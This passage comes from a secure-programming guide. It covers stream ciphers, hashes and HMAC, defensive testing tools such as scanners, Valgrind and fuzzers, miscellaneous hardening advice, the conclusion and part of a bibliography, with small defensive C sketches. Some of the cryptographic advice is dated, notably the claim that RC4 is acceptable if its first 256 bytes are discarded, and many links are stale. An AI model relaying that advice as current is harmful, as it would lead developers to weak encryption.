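secret and would normally be stored or sent along with the ciphertext:

#include <openssl/evp.h>
#include <openssl/rand.h>

/* Sketch: AES-128-CBC encryption with a new random IV for every message.
   Returns 0 on success, -1 on failure; *ctlen receives the ciphertext length.
   The caller must size ct to at least ptlen plus one block (16 bytes). */
int encrypt_cbc(const unsigned char key[16],
                const unsigned char *pt, int ptlen,
                unsigned char iv[16],
                unsigned char *ct, int *ctlen)
{
    EVP_CIPHER_CTX *ctx = EVP_CIPHER_CTX_new();
    int len = 0, total = 0;

    if (ctx == NULL)
        return -1;
    if (RAND_bytes(iv, 16) != 1)              /* unpredictable IV, never reused */
        goto fail;
    if (EVP_EncryptInit_ex(ctx, EVP_aes_128_cbc(), NULL, key, iv) != 1)
        goto fail;
    if (EVP_EncryptUpdate(ctx, ct, &len, pt, ptlen) != 1)
        goto fail;
    total = len;
    if (EVP_EncryptFinal_ex(ctx, ct + total, &len) != 1)
        goto fail;
    total += len;
    *ctlen = total;
    EVP_CIPHER_CTX_free(ctx);
    return 0;
fail:
    EVP_CIPHER_CTX_free(ctx);
    return -1;
}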
There are a number of different streaming encryption algorithms, but many of them have patent
restrictions. I know of no patent or technical issues with WAKE. RC4 was a trade secret of RSA Data
Security Inc; it’s been leaked since, and I know of no real legal impediment to its use, but RSA Data
Security has often threatened court action against users of it (it’s not at all clear what RSA Data Security
could do, but no doubt they could tie up users in worthless court cases). If you use RC4, use it as
intended - in particular, always discard the first 256 bytes it generates, or you’ll be vulnerable to attack.
SEAL is patented by IBM - so don’t use it. SOBER is patented; the patent owner has claimed that it will
allow many uses for free if permission is requested, but this creates an impediment for later use. Even
more interestingly, block encryption algorithms can be used in modes that turn them into stream ciphers,
and users who want stream ciphers should consider this approach (you’ll be able to choose between far
more publicly-available algorithms).
amount of data and generates a fixed-length number that is hard for an attacker to invert (e.g., it’s difficult
for an attacker to create a different set of data to generate that same value). Historically MD5 was
widely-used, but by the 1990s there were warnings that MD5 had become too weak [van Oorschot 1994]
[Dobbertin 1996]. Papers have since shown that MD5 simply can’t be trusted as a cryptographic hash -
see http://cryptography.hyperlink.cz/MD5_collisions.html. Don’t use the original SHA (now called
“SHA-0”); SHA-0 had the same weakness that MD5 does. After MD5 was broken, SHA-1 was the
typical favorite, and it worked well for years. However, SHA-1 has also become too weak today; SHA-1
should never be used in new programs for security, and existing programs should be implementing
alternative hash algorithms. Today’s programs should be using better and more secure hash algorithms
such as SHA-256 / SHA-384 / SHA-512 or the newer SHA-3.
The usual construction for a keyed hash is HMAC, which computes H(k XOR opad, H(k XOR ipad, data)),
where H is the hash function and k is the key. This is defined in detail in IETF RFC 2104.
Note that in the HMAC approach, a receiver can forge the same data as a sender. This isn’t usually a
problem, but if this must be avoided, then use public key methods and have the sender “sign” the data
with the sender private key - this avoids this forging attack, but it’s more expensive and for most
environments isn’t necessary.
11.7. Tools
Some tools may help you detect security problems before you field the result. They can’t find all such
problems, of course, but they can help catch problems that would otherwise slip by. Here are a few tools,
emphasizing open source / free software tools.
One obvious type of tool is a program to examine the source code to search for patterns of known
potential security problems (e.g., calls to library functions in ways that are often the source of security
vulnerabilities). These kinds of programs are called “source code scanners”. Here are a few such tools:
Some tools try to detect potential security flaws at run-time, either to counter them or at least to warn the
developer about them. Much of Crispin Cowan’s work, such as StackGuard, fits here.
There are several tools that try to detect various C/C++ memory-management problems; these are really
general-purpose software quality improvement tools, and not specific to security, but memory
management problems can definitely cause security problems. An especially capable tool is Valgrind,
which detects various memory-management problems (such as use of uninitialized memory,
reading/writing memory after it’s been free’d, reading/writing off the end of malloc’ed blocks, and
memory leaks). Another such tool is Electric Fence (efence) by Bruce Perens, which can detect certain
memory management errors. Memwatch (public domain) and YAMD (GPL) can detect memory
allocation problems for C and C++. You can even use the built-in capabilities of the GNU C library’s
malloc library, which has the MALLOC_CHECK_ environment variable (see its manual page for more
information). There are many others.
Another approach is to create test patterns and run the program, in an attempt to find weaknesses in the
program. Here are a few such tools:
• BFBTester, the Brute Force Binary Tester, is licensed under the GPL. This program does quick
security checks of binary programs. BFBTester performs checks of single and multiple argument
command line overflows and environment variable overflows. Version 2.0 and higher can also watch
for tempfile creation activity (to check for using unsafe tempfile names). At one time BFBTester didn’t
run on Linux (due to a technical issue in Linux’s POSIX threads implementation), but this has been
fixed as of version 2.0.1. More information is available at http://bfbtester.sourceforge.net/
• The fuzz program is a tool for testing other software. It tests programs by bombarding the program
being evaluated with random data. This tool isn’t really specific to security.
• SPIKE is a "fuzzer creation kit", i.e., it’s a toolkit designed to create "random" tests to find security
problems. The SPIKE toolkit is particularly designed for protocol analysis by simulating network
protocol clients, and SPIKE proXy is a tool built on SPIKE to test web applications. SPIKE includes a
few pre-canned tests. SPIKE is licensed under the GPL.
There are a number of tools that try to give you insight into running programs that can also be useful
when trying to find security problems in your code. This includes symbolic debuggers (such as gdb) and
trace programs (such as strace and ltrace). One interesting program to support analysis of running code is
Fenris (GPL license). Its documentation describes Fenris as a “multipurpose tracer, stateful analyzer and
partial decompiler intended to simplify bug tracking, security audits, code, algorithm or protocol analysis
- providing a structural program trace, general information about internal constructions, execution path,
memory operations, I/O, conditional expressions and much more.” Fenris actually supplies a whole suite
of tools, including extensive forensics capabilities and a nice debugging GUI for Linux. A list of other
promising open source tools that can be suitable for debugging or code analysis is available at
http://lcamtuf.coredump.cx/fenris/debug-tools.html. Another interesting program along these lines is
Subterfugue, which allows you to control what happens in every system call made by a program.
If you’re building a common kind of product where many standard potential flaws exist (like an ftp
server or firewall), you might find standard security scanning tools useful. One good one is Nessus; there
are many others. These kinds of tools are very useful for doing regression testing, but since they
essentially use a list of past specific vulnerabilities and common configuration errors, they may not be
very helpful in finding problems in new programs.
Often, you’ll need to call on other tools to implement your secure infrastructure. The Open-Source PKI
Book describes a number of open source programs for implementing a public key infrastructure (PKI).
Of course, running a “secure” program on an insecure platform configuration makes little sense. You may
want to examine hardening systems, which attempt to configure or modify systems to be more resistant
to attacks. For Linux, one hardening system is Bastille Linux, available at http://www.bastille-linux.org.
Another list of security tools is available at http://www.insecure.org/tools.html.
11.8. Windows CE
If you’re securing a Windows CE Device, you should read Maricia Alforque’s "Creating a Secure
Windows CE Device" at http://msdn.microsoft.com/library/techart/winsecurity.htm.
11.11. Miscellaneous
The following are miscellaneous security guidelines that I couldn’t seem to fit anywhere else:
Have your program check at least some of its assumptions before it uses them (e.g., at the beginning of
the program). For example, if you depend on the “sticky” bit being set on a given directory, test it; such
tests take little time and could prevent a serious problem. If you worry about the execution time of some
tests on each call, at least perform the test at installation time, or better yet at application start-up.
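For instance, a minimal sketch (the directory and function name are illustrative) of verifying the sticky-bit
assumption at start-up:

#include <sys/stat.h>
#include <stdio.h>
#include <stdlib.h>

/* Sketch: abort at start-up if a directory we depend on lacks the sticky bit. */
static void require_sticky_dir(const char *dir)
{
    struct stat st;

    if (stat(dir, &st) != 0 || !S_ISDIR(st.st_mode) || !(st.st_mode & S_ISVTX)) {
        fprintf(stderr, "FATAL: %s is not a directory with the sticky bit set\n", dir);
        exit(EXIT_FAILURE);
    }
}

/* e.g., call require_sticky_dir("/tmp"); early in main(). */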
If you have a built-in scripting language, it may be possible for the language to set an environment
variable which adversely affects the program invoking the script. Defend against this.
If you need a complex configuration language, make sure the language has a comment character and
include a number of commented-out secure examples. Often “#” is used for commenting, meaning “the
rest of this line is a comment”.
If possible, don’t create setuid or setgid root programs; make the user log in as root instead.
Sign your code. That way, others can check to see if what’s available was what was sent.
In some applications you may need to worry about timing attacks, where the variation in timing or CPU
utilization is enough to give away important information. This kind of attack has been used to obtain
keying information from Smartcards, for example. Mauro Lacy has published a paper titled Remote
Timing Techniques, showing that you can (in some cases) determine over an Internet whether or not a
given user id exists, simply from the effort expended by the CPU (which can be detected remotely using
techniques described in the paper). The only way to deal with these sorts of problems is to make sure that
the same effort is performed even when it isn’t necessary. The problem is that in some cases this may
make the system more vulnerable to a denial of service attack, since it can’t optimize away unnecessary
work.
Consider statically linking secure programs. This counters attacks on the dynamic link library
mechanism by making sure that the secure programs don’t use it. There are several downsides to this
however. This is likely to increase disk and memory use (from multiple copies of the same routines).
Even worse, it makes updating of libraries (e.g., for security vulnerabilities) more difficult - in most
systems they won’t be automatically updated and have to be tracked and implemented separately.
When reading over code, consider all the cases where a match is not made. For example, if there is a
switch statement, what happens when none of the cases match? If there is an “if” statement, what
happens when the condition is false?
Merely “removing” a file doesn’t eliminate the file’s data from a disk; on most systems this simply marks
the content as “deleted” and makes it eligible for later reuse, and often data is at least temporarily stored
in other places (such as memory, swap files, and temporary files). Indeed, against a determined attacker,
writing over the data isn’t enough. A classic paper on the problems of erasing magnetic media is Peter
Gutmann’s paper “Secure Deletion of Data from Magnetic and Solid-State Memory”. A determined
adversary can use other means, too, such as monitoring electromagnetic emissions from computers
(military systems have to obey TEMPEST rules to overcome this) and/or surreptitious attacks (such as
monitors hidden in keyboards).
When fixing a security vulnerability, consider adding a “warning” to detect and log an attempt to exploit
the (now fixed) vulnerability. This will reduce the likelihood of an attack, especially if there’s no way for
an attacker to predetermine if the attack will work, since it exposes an attack in progress. In short, it turns
a vulnerability into an intrusion detection system. This also suggests that exposing the version of a server
program before authentication is usually a bad idea for security, since doing so makes it easy for an
attacker to only use attacks that would work. Some programs make it possible for users to intentionally
“lie” about their version, so that attackers will use the “wrong attacks” and be detected. Also, if the
vulnerability can be triggered over a network, please make sure that security scanners can detect the
vulnerability. I suggest contacting Nessus (http://www.nessus.org) and making sure that their open source
security scanner can detect the problem. That way, users who don’t check their software for upgrades will
at least learn about the problem during their security vulnerability scans (if they do them as they should).
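On Unix-like systems, one straightforward way to record such exploit attempts is through syslog; the
sketch below is illustrative, and the program name and message text are placeholders:

    #include <syslog.h>

    /* Called from the code path that used to be vulnerable: the input is
     * now rejected, but we also record that someone tried the old attack. */
    void log_exploit_attempt(const char *peer_address)
    {
      openlog("mydaemon", LOG_PID, LOG_DAEMON);  /* "mydaemon" is a placeholder */
      syslog(LOG_WARNING,
             "rejected request matching known exploit pattern from %s",
             peer_address);
      closelog();
    }

Administrators who watch their logs (or feed them to an intrusion detection system) then see the attack
in progress even though it no longer succeeds.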
Always include in your documentation contact information for where to report security problems. You
should also support at least one of the common email addresses for reporting security problems
(security-alert@SITE, secure@SITE, or security@SITE); it’s often good to have support@SITE and
info@SITE working as well. Be prepared to support industry practices by those who have a security flaw
to report, such as the Full Disclosure Policy (RFPolicy) and the IETF Internet draft, “Responsible
Vulnerability Disclosure Process”. It’s important to quickly work with anyone who is reporting a security
flaw; remember that they are doing you a favor by reporting the problem to you, and that they are under
no obligation to do so. It’s especially important, once the problem is fixed, to give proper credit to the
reporter of the flaw (unless they ask otherwise). Many reporters provide the information solely to gain
the credit, and it’s generally accepted that credit is owed to the reporter. Some vendors argue that people
should never report vulnerabilities to the public; the problem with this argument is that keeping
vulnerabilities quiet was once the norm, and the result was vendors who denied vulnerabilities while their
customers were repeatedly subverted for years at a time.
Follow best practices and common conventions when leading a software development project. If you are
leading an open source software / free software project, some useful guidelines can be found in Free
Software Project Management HOWTO and Software Release Practice HOWTO; you should also read
The Cathedral and the Bazaar.
Every once in a while, review security guidelines like this one. At least re-read the conclusions in
Chapter 12, and feel free to go back to the introduction (Chapter 1) and start again!
Chapter 12. Conclusion
The end of a matter is better than its
beginning, and patience is better than
pride.
Ecclesiastes 7:8 (NIV)
Designing and implementing a truly secure program is actually a difficult task. The difficulty is that a
truly secure program must respond appropriately to all possible inputs and environments controlled by a
potentially hostile user. Developers of secure programs must deeply understand their platform, seek and
use guidelines (such as these), and then use assurance processes (such as inspections and other peer
review techniques) to reduce their programs’ vulnerabilities.
In conclusion, here are some of the key guidelines in this book:
• Validate all your inputs, including command line inputs, environment variables, CGI inputs, and so on.
Don’t just reject “bad” input; define what is an “acceptable” input and reject anything that doesn’t
match.
• Avoid buffer overflow. Make sure that long inputs (and long intermediate data values) can’t be used to
take over your program. This is the primary programmatic error at this time.
• Structure program internals. Secure the interface, minimize privileges, make the initial configuration
and defaults safe, and fail safe. Avoid race conditions (e.g., by safely opening any files in a shared
directory like /tmp). Trust only trustworthy channels (e.g., most servers must not trust their clients for
security checks or other sensitive data such as an item’s price in a purchase).
• Carefully call out to other resources. Limit their values to valid values (in particular be concerned
about metacharacters), and check all system call return values.
• Reply judiciously. In particular, minimize feedback to untrusted users, and safely handle the case
where output to an untrusted user is full or unresponsive.
Chapter 13. Bibliography
The words of the wise are like goads,
their collected sayings like firmly
embedded nails--given by one Shepherd.
Be warned, my son, of anything in
addition to them. Of making many books
there is no end, and much study wearies
the body.
Ecclesiastes 12:11-12 (NIV)
Note that there is a heavy emphasis on technical articles available on the web, since this is where most of
this kind of technical information is available.
[Advosys 2000] Advosys Consulting (formerly named Webber Technical Services). Writing Secure Web
Applications. http://advosys.ca/tips/web-security.html
[Al-Herbish 1999] Al-Herbish, Thamer. 1999. Secure Unix Programming FAQ.
http://www.whitefang.com/sup.
[Aleph1 1996] Aleph1. November 8, 1996. “Smashing The Stack For Fun And Profit”. Phrack
Magazine. Issue 49, Article 14. http://www.phrack.com/search.phtml?view&article=p49-14 or
alternatively http://www.2600.net/phrack/p49-14.html.
[Anonymous 1999] Anonymous. October 1999. Maximum Linux Security: A Hacker’s Guide to
Protecting Your Linux Server and Workstation. Sams. ISBN: 0672316706.
[Anonymous 1998] Anonymous. September 1998. Maximum Security : A Hacker’s Guide to Protecting
Your Internet Site and Network. Sams. Second Edition. ISBN: 0672313413.
[Anonymous Phrack 2001] Anonymous. August 11, 2001. Once upon a free(). Phrack, Volume 0x0b,
Issue 0x39, Phile #0x09 of 0x12. http://phrack.org/show.php?p=57&a=9
[AUSCERT 1996] Australian Computer Emergency Response Team (AUSCERT) and O’Reilly. May 23,
1996 (rev 3C). A Lab Engineers Check List for Writing Secure Unix Code.
ftp://ftp.auscert.org.au/pub/auscert/papers/secure_programming_checklist
[Bach 1986] Bach, Maurice J. 1986. The Design of the Unix Operating System. Englewood Cliffs, NJ:
Prentice-Hall, Inc. ISBN 0-13-201799-7 025.
[Beattie 2002] Beattie, Steve, Seth Arnold, Crispin Cowan, Perry Wagle, Chris Wright, Adam Shostack.
November 2002. Timing the Application of Security Patches for Optimal Uptime. 2002 LISA XVI,
November 3-8, 2002, Philadelphia, PA.
[Bellovin 1989] Bellovin, Steven M. April 1989. "Security Problems in the TCP/IP Protocol Suite"
Computer Communications Review 2:19, pp. 32-48. http://www.research.att.com/~smb/papers/ipext.pdf
[Bellovin 1994] Bellovin, Steven M. December 1994. Shifting the Odds -- Writing (More) Secure
Software. Murray Hill, NJ: AT&T Research. http://www.research.att.com/~smb/talks
[Bishop 1996] Bishop, Matt. May 1996. “UNIX Security: Security in Programming”. SANS ’96.
Washington DC (May 1996). http://olympus.cs.ucdavis.edu/~bishop/secprog.html
[Bishop 1997] Bishop, Matt. October 1997. “Writing Safe Privileged Programs”. Network Security 1997
New Orleans, LA. http://olympus.cs.ucdavis.edu/~bishop/secprog.html
[Blaze 1996] Blaze, Matt, Whitfield Diffie, Ronald L. Rivest, Bruce Schneier, Tsutomu Shimomura, Eric
Thompson, and Michael Wiener. January 1996. “Minimal Key Lengths for Symmetric Ciphers to
Provide Adequate Commercial Security: A Report by an Ad Hoc Group of Cryptographers and
Computer Scientists.” ftp://ftp.research.att.com/dist/mab/keylength.txt and
ftp://ftp.research.att.com/dist/mab/keylength.ps.
[CC 1999] The Common Criteria for Information Technology Security Evaluation (CC). August 1999.
Version 2.1. Technically identical to International Standard ISO/IEC 15408:1999. http://csrc.nist.gov/cc
[CERT 1998] Computer Emergency Response Team (CERT) Coordination Center (CERT/CC). February
13, 1998. Sanitizing User-Supplied Data in CGI Scripts. CERT Advisory CA-97.25.CGI_metachar.
http://www.cert.org/advisories/CA-97.25.CGI_metachar.html.
[Cheswick 1994] Cheswick, William R. and Steven M. Bellovin. Firewalls and Internet Security:
Repelling the Wily Hacker. Full text at http://www.wilyhacker.com.
[Clowes 2001] Clowes, Shaun. 2001. “A Study In Scarlet - Exploiting Common Vulnerabilities in PHP”
http://www.securereality.com.au/archives.html
[CMU 1998] Carnegie Mellon University (CMU). February 13, 1998 Version 1.4. “How To Remove
Meta-characters From User-Supplied Data In CGI Scripts”.
ftp://ftp.cert.org/pub/tech_tips/cgi_metacharacters.
[Cowan 1999] Cowan, Crispin, Perry Wagle, Calton Pu, Steve Beattie, and Jonathan Walpole. “Buffer
Overflows: Attacks and Defenses for the Vulnerability of the Decade”. Proceedings of DARPA
Information Survivability Conference and Expo (DISCEX), http://schafercorp-ballston.com/discex. Also
SANS 2000, http://www.sans.org/newlook/events/sans2000.htm. For a copy, see
http://immunix.org/documentation.html.
[Cox 2000] Cox, Philip. March 30, 2001. Hardening Windows 2000.
http://www.systemexperts.com/win2k/hardenW2K11.pdf.
[Crosby 2003] Crosby, Scott A., and Dan S Wallach. "Denial of Service via Algorithmic Complexity
Attacks" Usenix Security 2003. http://www.cs.rice.edu/~scrosby/hash.
[Dobbertin 1996]. Dobbertin, H. 1996. The Status of MD5 After a Recent Attack. RSA Laboratories’
CryptoBytes. Vol. 2, No. 2.
[Felten 1997] Edward W. Felten, Dirk Balfanz, Drew Dean, and Dan S. Wallach. Web Spoofing: An
Internet Con Game. Technical Report 540-96 (revised Feb. 1997). Department of Computer Science,
Princeton University. http://www.cs.princeton.edu/sip/pub/spoofing.pdf
[Fenzi 1999] Fenzi, Kevin, and Dave Wrenski. April 25, 1999. Linux Security HOWTO. Version 1.0.2.
http://www.tldp.org/HOWTO/Security-HOWTO.html
[FHS 1997] Filesystem Hierarchy Standard (FHS 2.0). October 26, 1997. Filesystem Hierarchy Standard
Group, edited by Daniel Quinlan. Version 2.0. http://www.pathname.com/fhs.
[Filipski 1986] Filipski, Alan and James Hanko. April 1986. “Making Unix Secure.” Byte (Magazine).
Peterborough, NH: McGraw-Hill Inc. Vol. 11, No. 4. ISSN 0360-5280. pp. 113-128.
[Flake 2001] Flake, Halvar. Auditing Binaries for Security Vulnerabilities.
http://www.blackhat.com/html/win-usa-01/win-usa-01-speakers.html.
[FOLDOC] Free On-Line Dictionary of Computing. http://foldoc.doc.ic.ac.uk/foldoc/index.html.
[Forristal 2001] Forristal, Jeff, and Greg Shipley. January 8, 2001. Vulnerability Assessment Scanners.
Network Computing. http://www.nwc.com/1201/1201f1b1.html
[FreeBSD 1999] FreeBSD, Inc. 1999. “Secure Programming Guidelines”. FreeBSD Security
Information. http://www.freebsd.org/security/security.html
[Friedl 1997] Friedl, Jeffrey E. F. 1997. Mastering Regular Expressions. O’Reilly. ISBN 1-56592-257-3.
[FSF 1998] Free Software Foundation. December 17, 1999. Overview of the GNU Project.
http://www.gnu.ai.mit.edu/gnu/gnu-history.html
[FSF 1999] Free Software Foundation. January 11, 1999. The GNU C Library Reference Manual.
Edition 0.08 DRAFT, for Version 2.1 Beta of the GNU C Library. Available at, for example,
http://www.netppl.fi/~pp/glibc21/libc_toc.html
[Fu 2001] Fu, Kevin, Emil Sit, Kendra Smith, and Nick Feamster. August 2001. “Dos and Don’ts of
Client Authentication on the Web”. Proceedings of the 10th USENIX Security Symposium, Washington,
D.C., August 2001. http://cookies.lcs.mit.edu/pubs/webauth.html.
[Gabrilovich 2002] Gabrilovich, Evgeniy, and Alex Gontmakher. February 2002. “Inside Risks: The
Homograph Attack”. Communications of the ACM. Volume 45, Number 2. Page 128.
[Galvin 1998a] Galvin, Peter. April 1998. “Designing Secure Software”. Sunworld.
http://www.sunworld.com/swol-04-1998/swol-04-security.html.
[Galvin 1998b] Galvin, Peter. August 1998. “The Unix Secure Programming FAQ”. Sunworld.
http://www.sunworld.com/sunworldonline/swol-08-1998/swol-08-security.html
[Garfinkel 1996] Garfinkel, Simson and Gene Spafford. April 1996. Practical UNIX & Internet Security,
2nd Edition. ISBN 1-56592-148-8. Sebastopol, CA: O’Reilly & Associates, Inc.
http://www.oreilly.com/catalog/puis
[Garfinkle 1997] Garfinkle, Simson. August 8, 1997. 21 Rules for Writing Secure CGI Programs.
http://webreview.com/wr/pub/97/08/08/bookshelf
[Gay 2000] Gay, Warren W. October 2000. Advanced Unix Programming. Indianapolis, Indiana: Sams
Publishing. ISBN 0-67231-990-X.
[Geodsoft 2001] Geodsoft. February 7, 2001. Hardening OpenBSD Internet Servers.
http://www.geodsoft.com/howto/harden.
[Graham 1999] Graham, Jeff. May 4, 1999. Security-Audit’s Frequently Asked Questions (FAQ).
http://lsap.org/faq.txt
[Gong 1999] Gong, Li. June 1999. Inside Java 2 Platform Security. Reading, MA: Addison Wesley
Longman, Inc. ISBN 0-201-31000-7.
[Gundavaram Unknown] Gundavaram, Shishir, and Tom Christiansen. Date Unknown. Perl CGI
Programming FAQ. http://language.perl.com/CPAN/doc/FAQs/cgi/perl-cgi-faq.html
[Hall 1999] Hall, Brian "Beej". Beej’s Guide to Network Programming Using Internet Sockets.
13-Jan-1999. Version 1.5.5. http://www.ecst.csuchico.edu/~beej/guide/net
[Howard 2002] Howard, Michael and David LeBlanc. 2002. Writing Secure Code. Redmond,
Washington: Microsoft Press. ISBN 0-7356-1588-8.
[ISO 12207] International Organization for Standardization (ISO). 1995. Information technology --
Software life cycle processes ISO/IEC 12207:1995.
[ISO 13335] International Organization for Standardization (ISO). ISO/IEC TR 13335. Guidelines for
the Management of IT Security (GMITS). Note that this is a five-part technical report (not a standard);
see also ISO/IEC 17799:2000. It includes:
[ISO 17799] International Organization for Standardization (ISO). December 2000. Code of Practice for
Information Security Management. ISO/IEC 17799:2000.
[ISO 9000] International Organization for Standardization (ISO). 2000. Quality management systems -
Fundamentals and vocabulary. ISO 9000:2000. See
http://www.iso.ch/iso/en/iso9000-14000/iso9000/selection_use/iso9000family.html
[ISO 9001] International Organization for Standardization (ISO). 2000. Quality management systems -
Requirements ISO 9001:2000
[Jones 2000] Jones, Jennifer. October 30, 2000. “Banking on Privacy”. InfoWorld, Volume 22, Issue 44.
San Mateo, CA: International Data Group (IDG). pp. 1-12.
[Kelsey 1998] Kelsey, J., B. Schneier, D. Wagner, and C. Hall. March 1998. "Cryptanalytic Attacks on
Pseudorandom Number Generators." Fast Software Encryption, Fifth International Workshop
Proceedings (March 1998), Springer-Verlag, 1998, pp. 168-188.
http://www.counterpane.com/pseudorandom_number.html.
[Kernighan 1988] Kernighan, Brian W., and Dennis M. Ritchie. 1988. The C Programming Language.
Second Edition. Englewood Cliffs, NJ: Prentice-Hall. ISBN 0-13-110362-8.
[Kim 1996] Kim, Eugene Eric. 1996. CGI Developer’s Guide. SAMS.net Publishing. ISBN:
1-57521-087-8 http://www.eekim.com/pubs/cgibook
[Kiriansky 2002] Kiriansky, Vladimir, Derek Bruening, Saman Amarasinghe. "Secure Execution Via
Program Shepherding". Proceedings of the 11th USENIX Security Symposium, San Francisco,
California, August 2002. http://cag.lcs.mit.edu/commit/papers/02/RIO-security-usenix.pdf
[Kolsek 2002] Kolsek, Mitja. December 2002. Session Fixation Vulnerability in Web-based Applications.
http://www.acros.si/papers/session_fixation.pdf.
[Kuchling 2000]. Kuchling, A.M. 2000. Restricted Execution HOWTO.
http://www.python.org/doc/howto/rexec/rexec.html
[Kuhn 2002] Kuhn, Markus G. Optical Time-Domain Eavesdropping Risks of CRT displays.
Proceedings of the 2002 IEEE Symposium on Security and Privacy, Oakland, CA, May 12-15, 2002.
http://www.cl.cam.ac.uk/~mgk25/ieee02-optical.pdf
[Landau 2004] Landau, Susan. Polynomials in the Nation’s Service: Using Algebra to Design the
Advanced Encryption Standard. 2004. American Mathematical Monthly.
http://research.sun.com/people/slandau/maa1.pdf
[LSD 2001] The Last Stage of Delirium. July 4, 2001. UNIX Assembly Codes Development for
Vulnerabilities Illustration Purposes. http://lsd-pl.net/papers.html#assembly.
[McClure 1999] McClure, Stuart, Joel Scambray, and George Kurtz. 1999. Hacking Exposed: Network
Security Secrets and Solutions. Berkeley, CA: Osborne/McGraw-Hill. ISBN 0-07-212127-0.
[McKusick 1999] McKusick, Marshall Kirk. January 1999. “Twenty Years of Berkeley Unix: From
AT&T-Owned to Freely Redistributable.” Open Sources: Voices from the Open Source Revolution.
http://www.oreilly.com/catalog/opensources/book/kirkmck.html.
[McGraw 1998] McGraw, Gary, and Edward W. Felten. December 1998. Twelve Rules for developing
more secure Java code. Javaworld.
http://www.javaworld.com/javaworld/jw-12-1998/jw-12-securityrules.html.
[McGraw 1999] McGraw, Gary, and Edward W. Felten. January 25, 1999. Securing Java: Getting Down
to Business with Mobile Code, 2nd Edition John Wiley & Sons. ISBN 047131952X.
http://www.securingjava.com.
[McGraw 2000a] McGraw, Gary and John Viega. March 1, 2000. Make Your Software Behave: Learning
the Basics of Buffer Overflows. http://www-4.ibm.com/software/developer/library/overflows/index.html.
[McGraw 2000b] McGraw, Gary and John Viega. April 18, 2000. Make Your Software Behave: Software
strategies. (“In the absence of hardware, you can devise a reasonably secure random number generator
through software.”)
http://www-106.ibm.com/developerworks/library/randomsoft/index.html?dwzone=security.
[Miller 1995] Miller, Barton P., David Koski, Cjin Pheow Lee, Vivekananda Maganty, Ravi Murthy,
Ajitkumar Natarajan, and Jeff Steidl. 1995. Fuzz Revisited: A Re-examination of the Reliability of
UNIX Utilities and Services. ftp://grilled.cs.wisc.edu/technical_papers/fuzz-revisited.pdf.
[Miller 1999] Miller, Todd C. and Theo de Raadt. “strlcpy and strlcat -- Consistent, Safe, String Copy
and Concatenation” Proceedings of Usenix ’99. http://www.usenix.org/events/usenix99/millert.html and
http://www.usenix.org/events/usenix99/full_papers/millert/PACKING_LIST
[Mookhey 2002] Mookhey, K. K. The Unix Auditor’s Practical Handbook.
http://www.nii.co.in/tuaph.html.
[MISRA 1998] Guidelines for the use of the C language in Vehicle Based Software. April 1998. The
Motor Industry Software Reliability Association (MISRA). http://www.misra.org.uk
[Mudge 1995] Mudge. October 20, 1995. How to write Buffer Overflows. l0pht advisories.
http://www.l0pht.com/advisories/bufero.html.
[Murhammer 1998] Murhammer, Martin W., Orcun Atakan, Stefan Bretz, Larry R. Pugh, Kazunari
Suzuki, and David H. Wood. October 1998. TCP/IP Tutorial and Technical Overview IBM International
Technical Support Organization. http://www.redbooks.ibm.com/pubs/pdfs/redbooks/gg243376.pdf
[NCSA] NCSA Secure Programming Guidelines.
http://www.ncsa.uiuc.edu/General/Grid/ACES/security/programming.
[Neumann 2000] Neumann, Peter. 2000. "Robust Nonproprietary Software." Proceedings of the 2000
IEEE Symposium on Security and Privacy (the “Oakland Conference”), May 14-17, 2000, Berkeley, CA.
Los Alamitos, CA: IEEE Computer Society. pp.122-123.
[NSA 2000] National Security Agency (NSA). September 2000. Information Assurance Technical
Framework (IATF). http://www.iatf.net.
[Open Group 1997] The Open Group. 1997. Single UNIX Specification, Version 2 (UNIX 98).
http://www.opengroup.org/online-pubs?DOC=007908799.
[OSI 1999] Open Source Initiative. 1999. The Open Source Definition.
http://www.opensource.org/osd.html.
[Opplinger 1998] Oppliger, Rolf. 1998. Internet and Intranet Security. Norwood, MA: Artech House.
ISBN 0-89006-829-1.
[Paulk 1993a] Mark C. Paulk, Bill Curtis, Mary Beth Chrissis, and Charles V. Weber. Capability
Maturity Model for Software, Version 1.1. Software Engineering Institute, CMU/SEI-93-TR-24. DTIC
Number ADA263403, February 1993. http://www.sei.cmu.edu/activities/cmm/obtain.cmm.html.
[Paulk 1993b] Mark C. Paulk, Charles V. Weber, Suzanne M. Garcia, Mary Beth Chrissis, and Marilyn
W. Bush. Key Practices of the Capability Maturity Model, Version 1.1. Software Engineering Institute.
CMU/SEI-93-TR-25, DTIC Number ADA263432, February 1993.
[Peteanu 2000] Peteanu, Razvan. July 18, 2000. Best Practices for Secure Web Development.
http://members.home.net/razvan.peteanu
[Pfleeger 1997] Pfleeger, Charles P. 1997. Security in Computing. Upper Saddle River, NJ: Prentice-Hall
PTR. ISBN 0-13-337486-6.
[Phillips 1995] Phillips, Paul. September 3, 1995. Safe CGI Programming.
http://www.go2net.com/people/paulp/cgi-security/safe-cgi.txt
[Quintero 1999] Quintero, Federico Mena, Miguel de Icaza, and Morten Welinder. GNOME
Programming Guidelines. http://developer.gnome.org/doc/guides/programming-guidelines/book1.html
[Raymond 1997] Raymond, Eric. 1997. The Cathedral and the Bazaar.
http://www.catb.org/~esr/writings/cathedral-bazaar
[Raymond 1998] Raymond, Eric. April 1998. Homesteading the Noosphere.
http://www.catb.org/~esr/writings/homesteading
[Ranum 1998] Ranum, Marcus J. 1998. Security-critical coding for programmers - a C and
UNIX-centric full-day tutorial. http://www.clark.net/pub/mjr/pubs/pdf/.
[RFC 822] August 13, 1982 Standard for the Format of ARPA Internet Text Messages. IETF RFC 822.
http://www.ietf.org/rfc/rfc0822.txt.
[rfp 1999] rain.forest.puppy. 1999. “Perl CGI problems”. Phrack Magazine. Issue 55, Article 07.
http://www.phrack.com/search.phtml?view&article=p55-7 or http://www.insecure.org/news/P55-07.txt.
[Rijmen 2000] Rijmen, Vincent. "LinuxSecurity.com Speaks With AES Winner".
http://www.linuxsecurity.com/feature_stories/interview-aes-3.html.
[Rochkind 1985]. Rochkind, Marc J. Advanced Unix Programming. Englewood Cliffs, NJ:
Prentice-Hall, Inc. ISBN 0-13-011818-4.
[Sahu 2002] Sahu, Bijaya Nanda, Srinivasan S. Muthuswamy, Satya Nanaji Rao Mallampalli, and
Venkata R. Bonam. July 2002 “Is your Java code secure -- or exposed? Build safer applications now to
avoid trouble later” http://www-106.ibm.com/developerworks/java/library/j-staticsec.html?loc=dwmain
[St. Laurent 2000] St. Laurent, Simon. February 2000. XTech 2000 Conference Reports. “When XML
Gets Ugly”. http://www.xml.com/pub/2000/02/xtech/megginson.html.
[Saltzer 1974] Saltzer, J. July 1974. “Protection and the Control of Information Sharing in MULTICS”.
